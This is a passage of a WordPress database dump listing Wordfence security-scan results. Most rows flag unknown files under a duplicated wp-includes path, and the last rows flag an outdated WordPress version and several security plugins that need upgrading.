href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/theme-compat/embed-404.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34708,1631564718,1631564718,'new','knownfile',75,'ce1097740cce5271b02648cced338958','1b91d5ca9e61fe1b533e22ab2654f559','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/embed-content.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/theme-compat/embed-content.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34709,1631564718,1631564718,'new','knownfile',75,'f981ab61b51da50d579a8009a85d97c0','297728c81ee00300910b857ff4d59c87','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/theme-compat/embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34710,1631564718,1631564718,'new','knownfile',75,'ae7bf5d86704bd7fb44d6e081a067136','755a8094818f58efc132f453bf7f32ba','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/footer-embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/theme-compat/footer-embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34711,1631564718,1631564718,'new','knownfile',75,'67ec43d031c24dd4b7891b1ba6326a88','9e854c0ecec98e3d1300e07784197b46','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/footer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/theme-compat/footer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34712,1631564718,1631564718,'new','knownfile',75,'6111f19e2ce59e81af9bf110e443dc8f','6d3b05dae5aef79e1ebf69ee0cc70851','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/header-embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/theme-compat/header-embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34713,1631564718,1631564718,'new','knownfile',75,'1b93f5bd5e023db4256fe6fed1862cf9','3a477fa8a4bdbc289d68989d9816a11a','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/header.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/theme-compat/header.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34714,1631564718,1631564718,'new','knownfile',75,'2aa0bf06dab2a8f5f22a90f15e3b17c3','fc7c04a474722ec20b47152901291d14','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/sidebar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/theme-compat/sidebar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34715,1631564718,1631564718,'new','knownfile',75,'c9b4301337909d4ab0d61844ef9c4328','4e487751a43ff9dc80d222e52a4d0ded','Unknown file in WordPress core: wp-includes/wp-includes/theme.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/theme.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34716,1631564718,1631564718,'new','knownfile',75,'110db214bded87665b2383dcdc6ff1e1','879b7d1a31b8cfacdcf8bd7a6bae9e31','Unknown file in WordPress core: wp-includes/wp-includes/update.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/update.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34717,1631564718,1631564718,'new','knownfile',75,'a522f938a6fd75c5e29dee38bb838817','f63541cd28472e75e3dfa8717e1b7129','Unknown file in WordPress core: wp-includes/wp-includes/user.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/user.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34718,1631564718,1631564718,'new','knownfile',75,'d1882d95b8069a2dee73034bca4a0cd0','8f3daac34569dcd0466733485d3f2468','Unknown file in WordPress core: wp-includes/wp-includes/vars.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/vars.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34719,1631564718,1631564718,'new','knownfile',75,'8d550b603afa12124b0330befa1e7575','17cad2d97eba7c113b522ae3e0384b8a','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34720,1631564718,1631564718,'new','knownfile',75,'a22481feb45e24d40eae87ae0de9666d','0511a9d2090836a9f8a622a68147066c','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-archives.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/widgets/class-wp-widget-archives.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34721,1631564718,1631564718,'new','knownfile',75,'c206a250d15557b9603c3928b9827a8a','e1df35fa8da86a8ed9cd7d9c2fdc7eef','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-calendar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/widgets/class-wp-widget-calendar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34722,1631564718,1631564718,'new','knownfile',75,'d87515f54076648893a1fdcac8fca8f7','016874bc5b661677ad4e2383a80e7658','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-categories.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/widgets/class-wp-widget-categories.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34723,1631564718,1631564718,'new','knownfile',75,'b013c87ed7c73c6990b4d9de1326dd09','dddb3cdfd338069f4651f4b8fdda1fc7','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34724,1631564719,1631564719,'new','knownfile',75,'dd85f6b869d5256e0e01a950a1d8d948','667225d36e3bf3b856aee5cc8868e754','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-links.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/widgets/class-wp-widget-links.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34725,1631564719,1631564719,'new','knownfile',75,'7dad97a2a10f71866bf550490331a7fa','ae101fb21ffddcde2018d215f020434b','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34726,1631564719,1631564719,'new','knownfile',75,'7408d79a635a605c2d360cd65160799f','9ef2c0f21ad5bd8e6b566c544c73b991','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34727,1631564719,1631564719,'new','knownfile',75,'adb7ade70fe666ec7be1217fe09f3cbc','e6c353cb8d2e25865c8a7ec2f7b9fd18','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-image.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-media-image.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34728,1631564719,1631564719,'new','knownfile',75,'06bf8bfb175a7b00179da4d1dac868ca','3862b9c6e8c2c55ee2372e0b78df29ac','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-video.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-media-video.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34729,1631564719,1631564719,'new','knownfile',75,'1fd0243c9e6d1688cf3b32cdbf1a56ec','50dee6119394596f084b0cb0c0310bed','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/widgets/class-wp-widget-media.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34730,1631564719,1631564719,'new','knownfile',75,'39956d5c3d3e0896fe72d1aaab5601c4','e29163971878e253c8e59c01969ffe4f','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-meta.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/widgets/class-wp-widget-meta.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34731,1631564719,1631564719,'new','knownfile',75,'8feb155731dcf0f30f8eff9152261c61','2cbe2d8b7814b5d4aa91f56777956058','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-pages.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/widgets/class-wp-widget-pages.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34732,1631564719,1631564719,'new','knownfile',75,'ad5d6e4bb147af95dc4b3a89e7d45adf','25ac6c40b942aec55eccb0057bc3f9f4','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34733,1631564719,1631564719,'new','knownfile',75,'d086cb33e5f64489b639bf4ad942b09c','f089b15d214ee3d3ee35e58d36e5be2e','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34734,1631564719,1631564719,'new','knownfile',75,'8b2d83b960e88198255a173610595f71','9f89e8211eda231cd4ffe65065fba968','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/widgets/class-wp-widget-rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34735,1631564719,1631564719,'new','knownfile',75,'a92cc4e58f3e4e21c8e3d051fb0a2e68','32a060de21778d3bcab0e6e20426fa89','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-search.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/widgets/class-wp-widget-search.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34736,1631564719,1631564719,'new','knownfile',75,'bfe07ace8f85604c9005cdc54f628814','5292733e61693d9f0314322208714c91','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34737,1631564719,1631564719,'new','knownfile',75,'3f45e340a65729fa92b8e96a9a508924','c67a8d84d88e10b2b073683e8107f3d4','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-text.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/widgets/class-wp-widget-text.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34738,1631564719,1631564719,'new','knownfile',75,'68bf09ad7165e6c676467e38e7188ae7','84acdf32c8dffa513f6e272db89c9e4c','Unknown file in WordPress core: wp-includes/wp-includes/widgets.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/widgets.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34739,1631564719,1631564719,'new','knownfile',75,'c487c2f869954dc8139b6f4462bdae3a','76dcecef8905bdc496d25fd0de95b142','Unknown file in WordPress core: wp-includes/wp-includes/wlwmanifest.xml','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/wlwmanifest.xml\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34740,1631564719,1631564719,'new','knownfile',75,'1b4c0842f6d04cd89cf5dda19f2b6d6a','f0f2d748f77fd58383fa816c8fba4030','Unknown file in WordPress core: wp-includes/wp-includes/wp-db.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/wp-db.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34741,1631564719,1631564719,'new','knownfile',75,'8306725d9fe84e10673c0f6dc8c39026','255ad7b6a04834a395aca0ec0e1d9120','Unknown file in WordPress core: wp-includes/wp-includes/wp-diff.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/wp-diff.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34769,1631615573,1631615573,'new','wfUpgrade',75,'24117975f6a30dcc10eb13acb08a1b7a','24117975f6a30dcc10eb13acb08a1b7a','Your WordPress version is out of date','WordPress version 5.8.1 is now available. Please upgrade immediately to get the latest security updates from WordPress.','a:2:{s:14:\"currentVersion\";s:5:\"5.7.3\";s:10:\"newVersion\";s:5:\"5.8.1\";}'),(34770,1631615573,1631615573,'new','wfPluginUpgrade',50,'d10cbb2cc5fd0d81faac1129b9834f02','d10cbb2cc5fd0d81faac1129b9834f02','The Plugin \"All In One WP Security\" needs an upgrade (4.4.8 -> 4.4.9).','You need to upgrade \"All In One WP Security\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:22:\"All In One WP Security\";s:9:\"PluginURI\";s:71:\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\";s:7:\"Version\";s:5:\"4.4.8\";s:11:\"Description\";s:153:\"All round best WordPress security plugin! <cite>By <a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>.</cite>\";s:6:\"Author\";s:94:\"<a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>\";s:9:\"AuthorURI\";s:33:\"https://www.tipsandtricks-hq.com/\";s:10:\"TextDomain\";s:35:\"all-in-one-wp-security-and-firewall\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:108:\"<a href=\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\">All In One WP Security</a>\";s:10:\"AuthorName\";s:46:\"Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy\";s:10:\"pluginFile\";s:108:\"/home/dogstardesign.co.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php\";s:10:\"newVersion\";s:5:\"4.4.9\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"wpURL\";s:65:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall\";s:10:\"vulnerable\";b:0;}'),(34771,1631615573,1631615573,'new','wfPluginUpgrade',50,'8ee229966744375cec8596965ac22a51','8ee229966744375cec8596965ac22a51','The Plugin \"Wordfence Security\" needs an upgrade (7.5.4 -> 7.5.5).','You need to upgrade \"Wordfence Security\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:18:\"Wordfence Security\";s:9:\"PluginURI\";s:25:\"http://www.wordfence.com/\";s:7:\"Version\";s:5:\"7.5.4\";s:11:\"Description\";s:131:\"Wordfence Security – Anti-virus, Firewall and Malware Scan <cite>By <a href=\"http://www.wordfence.com/\">Wordfence</a>.</cite>\";s:6:\"Author\";s:49:\"<a href=\"http://www.wordfence.com/\">Wordfence</a>\";s:9:\"AuthorURI\";s:25:\"http://www.wordfence.com/\";s:10:\"TextDomain\";s:9:\"wordfence\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:58:\"<a href=\"http://www.wordfence.com/\">Wordfence Security</a>\";s:10:\"AuthorName\";s:9:\"Wordfence\";s:10:\"pluginFile\";s:80:\"/home/dogstardesign.co.uk/public_html/wp-content/plugins/wordfence/wordfence.php\";s:10:\"newVersion\";s:5:\"7.5.5\";s:4:\"slug\";s:9:\"wordfence\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wordfence\";s:10:\"vulnerable\";b:0;}'),(34772,1631615573,1631615573,'new','wfPluginUpgrade',100,'e54f30536ac18886575053fce8de8e96','e54f30536ac18886575053fce8de8e96','The Plugin \"WP Cerber Security, Anti-spam & Malware Scan\" needs an upgrade (8.8.5 -> 8.9.3).','You need to upgrade \"WP Cerber Security, Anti-spam & Malware Scan\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:48:\"WP Cerber Security, Anti-spam & Malware 